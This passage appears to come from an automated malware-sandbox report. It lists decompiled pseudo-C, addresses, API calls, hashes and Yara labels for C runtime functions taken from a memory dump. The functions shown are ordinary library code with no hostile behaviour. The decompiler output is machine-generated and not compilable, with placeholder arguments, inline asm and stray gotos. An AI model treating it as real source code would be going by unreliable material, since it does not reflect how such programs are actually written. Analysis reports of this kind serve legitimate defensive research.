								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























            0x004078d4
            0x004078d5
            0x004078d6
            0x004078dd
            0x004078e2
            0x004078e8
            0x004078ee
            0x004078f4
            0x004078f7
            0x004078f7
            0x004078fa
            0x004078fc
            0x004078fc
            0x004078fa
            0x004078fe
            0x00407903
            0x0040790a
            0x0040790d
            0x0040790d
            0x00407929
            0x0040792f
            0x00407934
            0x00407ac7
            0x00407ad2
            0x00407ada
            0x0040793a
            0x0040793a
            0x0040793d
            0x00407942
            0x00407946
            0x0040799a
            0x0040799a
            0x0040799c
            0x0040799e
            0x00407abc
            0x00407abc
            0x00407abe
            0x00407abf
            0x00407ac5
            0x00000000
            0x00407ac5
            0x004079af
            0x004079b5
            0x004079b7
            0x00000000
            0x00000000
            0x004079bd
            0x004079cf
            0x004079d4
            0x004079d8
            0x00000000
            0x00000000
            0x004079e5
            0x00407a1f
            0x00407a22
            0x00407a25
            0x00407a27
            0x00407a29
            0x00407a2b
            0x00407a77
            0x00407a77
            0x00407a79
            0x00407a79
            0x00407a7b
            0x00407ab5
            0x00407ab6
            0x00000000
            0x00407abb
            0x00407a8f
            0x00407a94
            0x00407a96
            0x00000000
            0x00000000
            0x00407a9a
            0x00407a9b
            0x00407a9c
            0x00407a9f
            0x00407adb
            0x00407ade
            0x00407aa1
            0x00407aa1
            0x00407aa2
            0x00407aa2
            0x00407aaf
            0x00407ab1
            0x00407ab3
            0x00407ae4
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00407ab3
            0x00407a2d
            0x00407a30
            0x00407a32
            0x00407a34
            0x00407a36
            0x00407a39
            0x00407a3e
            0x00407a59
            0x00407a5b
            0x00407a65
            0x00407a67
            0x00407a68
            0x00407a6a
            0x00000000
            0x00000000
            0x00407a6c
            0x00407a72
            0x00407a72
            0x00000000
            0x00407a72
            0x00407a40
            0x00407a42
            0x00407a46
            0x00407a4b
            0x00407a4d
            0x00407a4f
            0x00000000
            0x00000000
            0x00407a51
            0x00000000
            0x00407a51
            0x004079e7
            0x004079ec
            0x00000000
            0x00000000
            0x004079f2
            0x004079f4
            0x00000000
            0x00000000
            0x00407a10
            0x00407a14
            0x00000000
            0x00000000
            0x00000000
            0x00407a1a
            0x0040794d
            0x0040794f
            0x00407951
            0x00407959
            0x00407978
            0x0040797a
            0x00407984
            0x00407986
            0x00407987
            0x00407989
            0x00000000
            0x00000000
            0x0040798f
            0x00407995
            0x00407995
            0x00000000
            0x00407995
            0x0040795d
            0x00407961
            0x00407966
            0x0040796a
            0x00000000
            0x00000000
            0x00407970
            0x00000000
            0x00407970

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
            • __alloca_probe_16.LIBCMT ref: 00407961
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
            • __alloca_probe_16.LIBCMT ref: 00407A46
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
            • __freea.LIBCMT ref: 00407AB6
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            • __freea.LIBCMT ref: 00407ABF
            • __freea.LIBCMT ref: 00407AE4
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
            • String ID:
            • API String ID: 3864826663-0
            • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
            • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
            Download Yara Rule
            C-Code - Quality: 72%
            			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x9c4b7b95
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































            0x0040822b
            0x00408232
            0x00408235
            0x0040823d
            0x00408241
            0x0040824d
            0x00408250
            0x00408253
            0x0040825a
            0x00408262
            0x00408265
            0x0040826b
            0x00408271
            0x00408276
            0x00408278
            0x0040827b
            0x00408280
            0x0040828a
            0x00408291
            0x00408294
            0x0040829b
            0x004082a2
            0x004082ce
            0x004082f4
            0x004082f6
            0x00000000
            0x004082d0
            0x004082d3
            0x0040839a
            0x004083a6
            0x004083b1
            0x004083b6
            0x004082d9
            0x004082e0
            0x004082e5
            0x004082eb
            0x004082f1
            0x00000000
            0x004082f1
            0x004082eb
            0x004082d3
            0x004082a4
            0x004082a8
            0x004082ab
            0x004082b1
            0x004082b3
            0x004082b6
            0x004082ba
            0x004082f7
            0x004082fa
            0x004082fb
            0x00408300
            0x00408306
            0x0040830c
            0x0040831b
            0x00408321
            0x00408327
            0x0040832c
            0x00408348
            0x004083bb
            0x004083c1
            0x0040834a
            0x00408352
            0x0040835b
            0x00408361
            0x00000000
            0x00408363
            0x00408365
            0x00408368
            0x00408381
            0x00000000
            0x00408383
            0x00408387
            0x00408389
            0x0040838c
            0x00000000
            0x0040838c
            0x00408387
            0x00408381
            0x00408361
            0x0040835b
            0x00408348
            0x0040832c
            0x00408306
            0x00000000
            0x0040838f
            0x0040838f
            0x004083c3
            0x004083cd
            0x004083d5

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
            • __fassign.LIBCMT ref: 004082E0
            • __fassign.LIBCMT ref: 004082FB
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
            • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
            • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
            • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 27%
            			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x9c4b7b95
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









            0x00403639
            0x00403640
            0x00403643
            0x00403647
            0x00403652
            0x0040365a
            0x00403665
            0x0040366b
            0x0040366f
            0x00403676
            0x0040367c
            0x0040367c
            0x0040367e
            0x00403683
            0x00403688
            0x00403688
            0x00403693
            0x0040369b

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
            • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
            • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
            Download Yara Rule
            C-Code - Quality: 79%
            			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x9c4b7b95
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























            0x004062c0
            0x004062c7
            0x004062ca
            0x004062d3
            0x004062d8
            0x004062dd
            0x004062e2
            0x004062e5
            0x004062e7
            0x004062e7
            0x004062ec
            0x00406305
            0x0040630b
            0x00406310
            0x004063af
            0x004063b3
            0x004063b8
            0x004063b8
            0x004063cc
            0x004063d4
            0x004063d4
            0x00406316
            0x00406319
            0x0040631e
            0x00406322
            0x0040636e
            0x00406370
            0x00406372
            0x00406377
            0x0040638e
            0x00406396
            0x004063a6
            0x004063a6
            0x00406396
            0x004063a8
            0x004063a9
            0x00000000
            0x004063ae
            0x00406324
            0x00406329
            0x0040632b
            0x0040632d
            0x0040632d
            0x00406335
            0x00406352
            0x0040635c
            0x00406361
            0x00000000
            0x00000000
            0x00406363
            0x00406369
            0x00406369
            0x00000000
            0x00406369
            0x00406339
            0x0040633d
            0x00406342
            0x00406346
            0x00000000
            0x00000000
            0x00406348
            0x00000000

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
            • __alloca_probe_16.LIBCMT ref: 0040633D
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
            • __freea.LIBCMT ref: 004063A9
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 313313983-0
            • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
            • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x9c4b7b96
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










            0x00405756
            0x0040575a
            0x00405761
            0x00405765
            0x00405773
            0x00405789
            0x0040578d
            0x004057b6
            0x004057b8
            0x004057bc
            0x004057bf
            0x004057bf
            0x004057c5
            0x004057c7
            0x00000000
            0x004057c8
            0x0040578f
            0x00405798
            0x004057a7
            0x0040579a
            0x0040579d
            0x004057a3
            0x004057a3
            0x004057ab
            0x00000000
            0x004057ad
            0x004057b0
            0x004057b2
            0x00000000
            0x004057b2
            0x004057ab
            0x00405767
            0x0040576c
            0x00000000

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
            • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
            • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
            Download Yara Rule
            C-Code - Quality: 71%
            			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















            0x00404320
            0x00404320
            0x00404320
            0x0040432a
            0x0040432c
            0x00404331
            0x00404334
            0x00404342
            0x00404349
            0x0040434e
            0x00404351
            0x00404354
            0x00404366
            0x0040436b
            0x0040436d
            0x00404378
            0x0040437f
            0x00404384
            0x00404387
            0x00404389
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040436f
            0x0040436f
            0x00000000
            0x0040436f
            0x00404356
            0x00404356
            0x00404357
            0x00404357
            0x0040435c
            0x00404397
            0x00404398
            0x0040439e
            0x004043a3
            0x004043a6
            0x004043a7
            0x004043a8
            0x004043af
            0x004043b1
            0x004043b3
            0x004043b8
            0x004043bb
            0x004043c9
            0x004043d5
            0x004043d8
            0x004043db
            0x004043ed
            0x004043f2
            0x004043f4
            0x004043ff
            0x00404405
            0x0040440d
            0x0040440f
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004043f6
            0x004043f6
            0x00000000
            0x004043f6
            0x004043dd
            0x004043dd
            0x004043de
            0x004043de
            0x00404411
            0x00404412
            0x00404412
            0x004043bd
            0x004043c3
            0x004043c7
            0x0040441a
            0x0040441b
            0x00404421
            0x00000000
            0x00000000
            0x00000000
            0x004043c7
            0x00404428
            0x00404428
            0x00404336
            0x0040433c
            0x00404340
            0x0040438b
            0x0040438c
            0x00404396
            0x00000000
            0x00000000
            0x00000000
            0x00404340

            APIs
            • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
            • _abort.LIBCMT ref: 0040439E
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
            • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
            • Opcode Fuzzy Hash: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
            • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





            0x004025ba
            0x004025bf
            0x004025cb
            0x004025d0
            0x004025d5
            0x004025d7
            0x004025e2
            0x004025d9
            0x004025d9
            0x00000000
            0x004025d9
            0x004025cd
            0x004025cd
            0x004025cf
            0x004025cf

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
              • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
